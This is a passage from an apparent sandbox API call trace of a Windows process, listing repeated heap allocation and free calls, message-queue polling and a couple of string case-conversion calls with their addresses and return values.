Size=0x18) returned 0x90d4a0 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0182.193] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0182.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0182.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0182.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.196] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0182.196] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0182.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0182.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0182.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0182.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0182.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.199] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0182.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0182.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0182.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0182.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0182.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0182.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | 